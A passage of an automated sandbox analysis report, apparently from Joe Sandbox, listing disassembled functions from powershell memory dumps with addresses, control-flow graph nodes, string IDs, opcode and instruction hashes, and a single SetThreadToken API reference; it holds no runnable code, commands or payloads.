                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $cuk$4'^q$4'^q$tP^q$tP^q
                                        • API String ID: 0-2963468526
                                        • Opcode ID: 3d4f97fde8df08f123149d761d546feb25fae2aec80ebd6dc02db5d5b1d35300
                                        • Instruction ID: d60278de256904c7ddae5d87c36349572bcd2bc546467b8c1f2160918dcd912c
                                        • Opcode Fuzzy Hash: 3d4f97fde8df08f123149d761d546feb25fae2aec80ebd6dc02db5d5b1d35300
                                        • Instruction Fuzzy Hash: C7915F73B043268FC7259BA8941466BBBE6BFC5210F15C6ABD415DF251DA32CC4BC3A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07023280 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (_^q$(_^q$(_^q$(_^q$(_^q
                                        • API String ID: 0-3429793122
                                        • Opcode ID: 5062fdf8dbc7eb2683939a2e06d27256b4749a36a9ad4ebf31cd3d48cfb0e155
                                        • Instruction ID: 08a323d4baebf1b9a4d42c1756893b761fc022aa0fc7be9380730c272792571e
                                        • Opcode Fuzzy Hash: 5062fdf8dbc7eb2683939a2e06d27256b4749a36a9ad4ebf31cd3d48cfb0e155
                                        • Instruction Fuzzy Hash: 7821A4BAA083918FC3198F698414025FFF1AFC661032D89DBC455DF3A6DA389D4ACB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E18C41 Relevance: 5.2, Strings: 4, Instructions: 242COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: 05651ff23e3053e3544fb8760166bf124f68da374d6f149bd359ea6239ca2fec
                                        • Instruction ID: bb84ac2948f353d33a31056a3c99562da52cc3ef42b95f63193ba68fe13c2b45
                                        • Opcode Fuzzy Hash: 05651ff23e3053e3544fb8760166bf124f68da374d6f149bd359ea6239ca2fec
                                        • Instruction Fuzzy Hash: C9B1A374E006099FCB55DFA9D980A9DFBF2FF88304F108629E419AB355DB30A945CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E18C50 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: c5b2cdc0a6f363fe25d8554c1210a95f8ea06737dd6ea829bf27d402bff62e2b
                                        • Instruction ID: 04ea64e41b68847bbb3df256061777a429038b778d43f38a53cc4ff99a2c9f34
                                        • Opcode Fuzzy Hash: c5b2cdc0a6f363fe25d8554c1210a95f8ea06737dd6ea829bf27d402bff62e2b
                                        • Instruction Fuzzy Hash: 93B18274E016099FCB54DFA9D980A9DFBF2FF88304F108629E419AB355DB30A949CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07023308 Relevance: 5.1, Strings: 4, Instructions: 66COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (_^q$(_^q$(_^q$(_^q
                                        • API String ID: 0-2697572114
                                        • Opcode ID: 7a0bddb422323482df739170e1e1fae2f3a0f0c02f6cf3652225642ec0f67882
                                        • Instruction ID: 1fc7cac771c5575a537159d64f7b186f71d3a99c6eb83b74f70373d37e016d10
                                        • Opcode Fuzzy Hash: 7a0bddb422323482df739170e1e1fae2f3a0f0c02f6cf3652225642ec0f67882
                                        • Instruction Fuzzy Hash: 0F1104FBB082218BC7148A6E900012AF7EAAFD1720728843FD415CB350DE36D947D790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 070232EC Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (_^q$(_^q$(_^q$(_^q
                                        • API String ID: 0-2697572114
                                        • Opcode ID: 51e41eab5d99dc550da9012cf05d48366912f65cbe4dad1b589efd0511f46e90
                                        • Instruction ID: f56c0d415c5affc451eb4f58e5f98d8ff67fc6f17ee7926932b86f8152954e50
                                        • Opcode Fuzzy Hash: 51e41eab5d99dc550da9012cf05d48366912f65cbe4dad1b589efd0511f46e90
                                        • Instruction Fuzzy Hash: D201D2BAA083919FC7064A2E44000B6FFF5AFC362072D41ABD450DF292DA39990AC7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07020308 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q
                                        • API String ID: 0-2049395529
                                        • Opcode ID: c075cc8e1410d0d45f9512161aeda489e10f3300716ee13b0293e6cb7618e32f
                                        • Instruction ID: 23b663d2aa7c3d2aa74ce14e0e3810c857e31da74d9da07f228764d9fe64b477
                                        • Opcode Fuzzy Hash: c075cc8e1410d0d45f9512161aeda489e10f3300716ee13b0293e6cb7618e32f
                                        • Instruction Fuzzy Hash: AD01842170E3DA4FC32B12681924169BFBA5F8755071A45DBD041DF3A7CE158C8A83A7
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:6.7%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:3
                                        Total number of Limit Nodes:0
                                        execution_graph 18877 87e35f8 18878 87e363b SetThreadToken 18877->18878 18879 87e3669 18878->18879

                                        Executed Functions

                                        Function 04C7AF97 Relevance: 6.6, Strings: 5, Instructions: 314COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 501 4c7af97-4c7afa2 502 4c7afa4-4c7afa6 501->502 503 4c7afab-4c7afb1 501->503 502->503 504 4c7afb3-4c7afc2 503->504 505 4c7b02f-4c7b031 503->505 512 4c7afc4-4c7afc6 504->512 513 4c7afcb-4c7afd6 504->513 508 4c7b033-4c7b049 505->508 510 4c7b04e-4c7b389 call 4c7a2f4 508->510 511 4c7b04b 508->511 582 4c7b38e-4c7b395 510->582 511->510 512->513 516 4c7afd9-4c7afe0 513->516 516->516 518 4c7afe2-4c7b02a 516->518 518->508 527 4c7b02c 518->527 527->505
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CYm^$SYm^$cYm^$sYm^$Ym^
                                        • API String ID: 0-1379649019
                                        • Opcode ID: 0fe950a1a816dadfc06518f73a793d2f276affe523d5d8ad3d3007a0cb662137
                                        • Instruction ID: 747ba45fb919ad8f7fd85c4b620ec3dd6f4aa51cd38eeac6e63963763d9d53bb
                                        • Opcode Fuzzy Hash: 0fe950a1a816dadfc06518f73a793d2f276affe523d5d8ad3d3007a0cb662137
                                        • Instruction Fuzzy Hash: 8BB1E5B1A007545FDB1AEFB488145AEBBB3DF85708B00852ED149AF340DF75AD0A8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7B020 Relevance: 6.5, Strings: 5, Instructions: 258COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 583 4c7b020-4c7b022 584 4c7b024-4c7b028 583->584 585 4c7b02b-4c7b049 583->585 584->585 587 4c7b04e-4c7b389 call 4c7a2f4 585->587 588 4c7b04b 585->588 649 4c7b38e-4c7b395 587->649 588->587
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CYm^$SYm^$cYm^$sYm^$Ym^
                                        • API String ID: 0-1379649019
                                        • Opcode ID: 1b157330b578405d43b3d6c245666edf7633dd4f656c0ffaac3de7c3490c18d1
                                        • Instruction ID: c0b67323bec9183198d514dc21742b6ca712ae9105161983639fa2d71f40df6b
                                        • Opcode Fuzzy Hash: 1b157330b578405d43b3d6c245666edf7633dd4f656c0ffaac3de7c3490c18d1
                                        • Instruction Fuzzy Hash: 299152B5B007155FDB1AEFB4C5145AEBAA3EF84704B00892DD14AAB340DF75AD0A8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7B030 Relevance: 6.5, Strings: 5, Instructions: 252COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 650 4c7b030-4c7b049 652 4c7b04e-4c7b389 call 4c7a2f4 650->652 653 4c7b04b 650->653 714 4c7b38e-4c7b395 652->714 653->652
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CYm^$SYm^$cYm^$sYm^$Ym^
                                        • API String ID: 0-1379649019
                                        • Opcode ID: 05093c6d29b4479d45479327ca34e84c9060eeadf0fa097c68557cb17023b0d7
                                        • Instruction ID: 9be27d451e6c9ef333f37355a4205b8337321e1805810c895e106090502a7002
                                        • Opcode Fuzzy Hash: 05093c6d29b4479d45479327ca34e84c9060eeadf0fa097c68557cb17023b0d7
                                        • Instruction Fuzzy Hash: A29153B5B006155FDB1AEFB4C5145AEBAE3EF84704B00892DD14AAB340DF75AD0A8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07971AE0 Relevance: 16.9, Strings: 12, Instructions: 1925COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2074949142.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$xl$xl
                                        • API String ID: 0-1567293520
                                        • Opcode ID: 9cbd1180927598bd3ba0e01ebfb8a2d65caf628af3cb7ee7c69b615c585cfae9
                                        • Instruction ID: 36c7d3147c92d5d8ccc822b906477d6089ca71dcf65a2c70c48cfb2ada656bcc
                                        • Opcode Fuzzy Hash: 9cbd1180927598bd3ba0e01ebfb8a2d65caf628af3cb7ee7c69b615c585cfae9
                                        • Instruction Fuzzy Hash: 7CA259B1B1420ADFCB258B68C90576ABBB6BFC6318F1484BAD505CF351DB32D885C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7DED0 Relevance: 2.8, Strings: 2, Instructions: 340COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 715 4c7ded0-4c7df11 718 4c7df13 715->718 719 4c7df18-4c7e050 call 4c7de60 715->719 718->719 739 4c7e072-4c7e084 719->739 740 4c7e052-4c7e06a call 4c7de60 719->740 742 4c7e086-4c7e098 739->742 743 4c7e09a-4c7e0b5 739->743 740->739 742->743 745 4c7e0c3-4c7e0c5 742->745 743->745 748 4c7e0b7-4c7e0c1 743->748 746 4c7e0cd-4c7e0df 745->746 749 4c7e0f5-4c7e110 746->749 750 4c7e0e1-4c7e0f3 746->750 748->746 751 4c7e121-4c7e123 749->751 755 4c7e112-4c7e11f 749->755 750->749 750->751 754 4c7e12e-4c7e140 751->754 756 4c7e156-4c7e171 754->756 757 4c7e142-4c7e154 754->757 755->754 758 4c7e182-4c7e184 756->758 762 4c7e173-4c7e180 756->762 757->756 757->758 760 4c7e18f-4c7e1a3 758->760 763 4c7e1a5 760->763 764 4c7e1d9-4c7e1db 760->764 762->760 763->764 765 4c7e203-4c7e20d 763->765 766 4c7e20f-4c7e211 763->766 767 4c7e1ac-4c7e1b8 763->767 768 4c7e1ba-4c7e1c6 763->768 769 4c7e1c8-4c7e1d7 763->769 770 4c7e1e6-4c7e1fa 764->770 772 4c7e21c-4c7e22f 765->772 766->772 767->770 768->770 769->770 770->766 776 4c7e1fc 770->776 780 4c7e253-4c7e266 772->780 781 4c7e231-4c7e24b 772->781 776->765 776->766 784 4c7e26f-4c7e271 780->784 785 4c7e268-4c7e26d 780->785 781->780 786 4c7e278-4c7e27a 784->786 785->786 787 4c7e2a5-4c7e2ea 786->787 788 4c7e27c-4c7e29d 786->788 792 4c7e313-4c7e327 787->792 793 4c7e2ec-4c7e30b 787->793 798 4c7e29f call 4c7f5f0 788->798 799 4c7e29f call 4c7f640 788->799 795 4c7e343-4c7e34c 792->795 796 4c7e329-4c7e33b 792->796 793->792 796->795 798->787 799->787
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c/m^$s/m^
                                        • API String ID: 0-2366638527
                                        • Opcode ID: 756ca445734ca90d8802ba1ff8202acef3140f205bb1bfb91b85ec153416db19
                                        • Instruction ID: c2c01aa0614ee44a13d9849865a0905a2674529b24b13009b039c4de0ceabf8a
                                        • Opcode Fuzzy Hash: 756ca445734ca90d8802ba1ff8202acef3140f205bb1bfb91b85ec153416db19
                                        • Instruction Fuzzy Hash: D1E1F9397002048FDB05DF68C588AA9BBF2FF49315F4984A9E40AAB362DB35ED45CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7DEC0 Relevance: 2.8, Strings: 2, Instructions: 336COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 800 4c7dec0-4c7dec2 801 4c7dec4-4c7dec8 800->801 802 4c7decb-4c7df11 800->802 801->802 806 4c7df13 802->806 807 4c7df18-4c7e050 call 4c7de60 802->807 806->807 827 4c7e072-4c7e084 807->827 828 4c7e052-4c7e06a call 4c7de60 807->828 830 4c7e086-4c7e098 827->830 831 4c7e09a-4c7e0b5 827->831 828->827 830->831 833 4c7e0c3-4c7e0c5 830->833 831->833 836 4c7e0b7-4c7e0c1 831->836 834 4c7e0cd-4c7e0df 833->834 837 4c7e0f5-4c7e110 834->837 838 4c7e0e1-4c7e0f3 834->838 836->834 839 4c7e121-4c7e123 837->839 843 4c7e112-4c7e11f 837->843 838->837 838->839 842 4c7e12e-4c7e140 839->842 844 4c7e156-4c7e171 842->844 845 4c7e142-4c7e154 842->845 843->842 846 4c7e182-4c7e184 844->846 850 4c7e173-4c7e180 844->850 845->844 845->846 848 4c7e18f-4c7e1a3 846->848 851 4c7e1a5 848->851 852 4c7e1d9-4c7e1db 848->852 850->848 851->852 853 4c7e203-4c7e20d 851->853 854 4c7e20f-4c7e211 851->854 855 4c7e1ac-4c7e1b8 851->855 856 4c7e1ba-4c7e1c6 851->856 857 4c7e1c8-4c7e1d7 851->857 858 4c7e1e6-4c7e1fa 852->858 860 4c7e21c-4c7e22f 853->860 854->860 855->858 856->858 857->858 858->854 864 4c7e1fc 858->864 868 4c7e253-4c7e266 860->868 869 4c7e231-4c7e24b 860->869 864->853 864->854 872 4c7e26f-4c7e271 868->872 873 4c7e268-4c7e26d 868->873 869->868 874 4c7e278-4c7e27a 872->874 873->874 875 4c7e2a5-4c7e2ea 874->875 876 4c7e27c-4c7e29d 874->876 880 4c7e313-4c7e327 875->880 881 4c7e2ec-4c7e30b 875->881 886 4c7e29f call 4c7f5f0 876->886 887 4c7e29f call 4c7f640 876->887 883 4c7e343-4c7e34c 880->883 884 4c7e329-4c7e33b 880->884 881->880 884->883 886->875 887->875
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c/m^$s/m^
                                        • API String ID: 0-2366638527
                                        • Opcode ID: 9864de32418e36a2dea94dab131b07fb7463d87d1149dca2ab584f19e6ca54cf
                                        • Instruction ID: f6c84ccc860ff6ea64493dbefb215fc21c630a085679b77f3d8c8b492254b644
                                        • Opcode Fuzzy Hash: 9864de32418e36a2dea94dab131b07fb7463d87d1149dca2ab584f19e6ca54cf
                                        • Instruction Fuzzy Hash: D8E1E7397002048FDB05DF68C588AA9BBF2FF49315F4984A9E40AAB362DB35ED45CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 087E35F0 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 888 87e35f0-87e3633 890 87e363b-87e3667 SetThreadToken 888->890 891 87e3669-87e366f 890->891 892 87e3670-87e368d 890->892 891->892
                                        APIs
                                        • SetThreadToken.KERNELBASE(?), ref: 087E365A
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2082348655.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: 0f8d4210d657302235e17099d92702f7cdb31ddbc6a7b211a069a7278bdc0bbf
                                        • Instruction ID: 810d342de700c254d46b71a4e46464e1259731c4dc25790a00a268f7e8799556
                                        • Opcode Fuzzy Hash: 0f8d4210d657302235e17099d92702f7cdb31ddbc6a7b211a069a7278bdc0bbf
                                        • Instruction Fuzzy Hash: 561126B19002488FDB10DFA9C545BDEFFF4AB49324F24886AD058A7350C775A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 087E35F8 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 895 87e35f8-87e3667 SetThreadToken 897 87e3669-87e366f 895->897 898 87e3670-87e368d 895->898 897->898
                                        APIs
                                        • SetThreadToken.KERNELBASE(?), ref: 087E365A
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2082348655.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: d851602f5919308b68e0533930c189cc72f5f5c7e0bebbfc98cba30c275cc5cb
                                        • Instruction ID: 4e6812ad851e8c1c5655ccc5c3203ade620127a95ad55f103bf585a9ed53bb00
                                        • Opcode Fuzzy Hash: d851602f5919308b68e0533930c189cc72f5f5c7e0bebbfc98cba30c275cc5cb
                                        • Instruction Fuzzy Hash: D71106B59002098FCB10DFAAD544BDEFBF8EF49324F14846AD458A7350D774A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7BBA8 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 901 4c7bba8-4c7bbc5 904 4c7bbcb-4c7bbef call 4c77678 901->904 905 4c7bc5a-4c7bc90 901->905 913 4c7bbf1-4c7bbf8 904->913 914 4c7bbfb-4c7bbfe 904->914 916 4c7bc92 905->916 917 4c7bced-4c7bcf4 905->917 918 4c7bc06-4c7bc08 914->918 919 4c7bc94-4c7bc9a 916->919 920 4c7bc9b-4c7bce9 916->920 921 4c7bc14-4c7bc57 call 4c77678 918->921 922 4c7bc0a-4c7bc11 918->922 919->920 920->917
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq
                                        • API String ID: 0-149360118
                                        • Opcode ID: 2c288289e574e01290f21a967de8b6688ee64f7114c1aa23ce79deafe350b84c
                                        • Instruction ID: 40e2727b8146a887160148910c56e99307f9278e87e75cb5d11ee462ad2e4531
                                        • Opcode Fuzzy Hash: 2c288289e574e01290f21a967de8b6688ee64f7114c1aa23ce79deafe350b84c
                                        • Instruction Fuzzy Hash: BE31E2753042009FD715EB79E89096EBB97EFC43A4710853ED60ACB254DE31EC4687A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7A8C9 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 936 4c7a8c9-4c7a8ca 937 4c7a8d3-4c7a8d6 936->937 938 4c7a8cc-4c7a8d0 936->938 941 4c7a8df-4c7a910 937->941 942 4c7a8d8-4c7a8d9 937->942 939 4c7a912-4c7a959 938->939 940 4c7a8d2 938->940 950 4c7a963-4c7a96e 939->950 940->937 943 4c7a8db-4c7a8dc 940->943 941->939 942->943 943->941 962 4c7a971 call 4c7aa00 950->962 963 4c7a971 call 4c7aa10 950->963 951 4c7a977-4c7a9fc call 4c78a94 962->951 963->951
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: em^
                                        • API String ID: 0-2080301082
                                        • Opcode ID: b368c3d9e832ce990cf9d28648079acc01756c82fe0cc21ab1faf55731c5958f
                                        • Instruction ID: c3099102f9bd0859d38ca814bfe92b41e366c4416e67f0798969ae6c0942b49d
                                        • Opcode Fuzzy Hash: b368c3d9e832ce990cf9d28648079acc01756c82fe0cc21ab1faf55731c5958f
                                        • Instruction Fuzzy Hash: F731B478E006059FDB04EFA4D855ABEBBB3EF88300F118479D204AB395DA39ED468F51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7BAB1 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 964 4c7bab1-4c7bab2 965 4c7bab4-4c7baba 964->965 966 4c7babb-4c7babe 964->966 965->966 967 4c7bac3-4c7badf 965->967 966->967 968 4c7bae1 967->968 969 4c7baeb-4c7bb11 967->969 968->969 986 4c7bb14 call 4c7bb97 969->986 987 4c7bb14 call 4c7bba8 969->987 973 4c7bb16-4c7bb1a 974 4c7bb1c-4c7bb20 973->974 975 4c7bb8b-4c7bb94 973->975 976 4c7bb26-4c7bb2a 974->976 977 4c7bb22 974->977 978 4c7bb41 976->978 979 4c7bb2c-4c7bb3f 976->979 977->976 980 4c7bb46-4c7bb56 978->980 979->980 981 4c7bb78 980->981 982 4c7bb58-4c7bb76 980->982 983 4c7bb7a-4c7bb83 981->983 982->983 983->975 986->973 987->973
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: </wl
                                        • API String ID: 0-2362596250
                                        • Opcode ID: af4d4a29c9c876ce5c3b8032aeee5cc960c7950b4e9013b032be42be4694a66e
                                        • Instruction ID: fb46c46170430b9ebcf7351f79aae6506dda5bd3132f6f9f17fbe04be2091885
                                        • Opcode Fuzzy Hash: af4d4a29c9c876ce5c3b8032aeee5cc960c7950b4e9013b032be42be4694a66e
                                        • Instruction Fuzzy Hash: 1A31CE357003018FCB11CF69C980AAAFBF6AF88314F04846AE559DB365E771FE498B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7AB38 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 988 4c7ab38-4c7ab41 call 4c7a07c 992 4c7ab46-4c7ab4a 988->992 993 4c7ab4c-4c7ab59 992->993 994 4c7ab5a-4c7abf5 992->994 1003 4c7abf7-4c7abfd 994->1003 1004 4c7abfe-4c7ac1b 994->1004 1003->1004
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (&^q
                                        • API String ID: 0-2067289071
                                        • Opcode ID: f5776fc7eeff167ac1d9bb5f3f8c7078b0e3fa6aa430208129754614a5b5a928
                                        • Instruction ID: 2f28cc1bef1100dfda96ee060aa850a59af4f21b17acf86060cfede69a99eb44
                                        • Opcode Fuzzy Hash: f5776fc7eeff167ac1d9bb5f3f8c7078b0e3fa6aa430208129754614a5b5a928
                                        • Instruction Fuzzy Hash: BA21D171A042588FCB14DFAED404B9EBFF6EB88360F24846ED108E7340CB75A945CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7A8D8 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1007 4c7a8d8-4c7a96e 1029 4c7a971 call 4c7aa00 1007->1029 1030 4c7a971 call 4c7aa10 1007->1030 1018 4c7a977-4c7a9fc call 4c78a94 1029->1018 1030->1018
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: em^
                                        • API String ID: 0-2080301082
                                        • Opcode ID: 24c75be6203ac7add783745edcfe1d8ecb4c68b50d54c56917f9c068fda6340a
                                        • Instruction ID: 146dbb8f0e23ddbe22250fafae75e50cec2e75db5b068504fa2adf0db5e1c922
                                        • Opcode Fuzzy Hash: 24c75be6203ac7add783745edcfe1d8ecb4c68b50d54c56917f9c068fda6340a
                                        • Instruction Fuzzy Hash: D4315078E006099FDB04EFA4D854ABEB7B3EF84304F118478D215AB395DA79DD458F90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7F6B0 Relevance: .3, Instructions: 254COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91a4f406c97246a3eb609dc3a4d8880a361b836ea98e0625fe1bc30511c3e888
                                        • Instruction ID: 5ba529bc4f187d261719633651d5e35b5b6a499242be319a645114d30d8d08a1
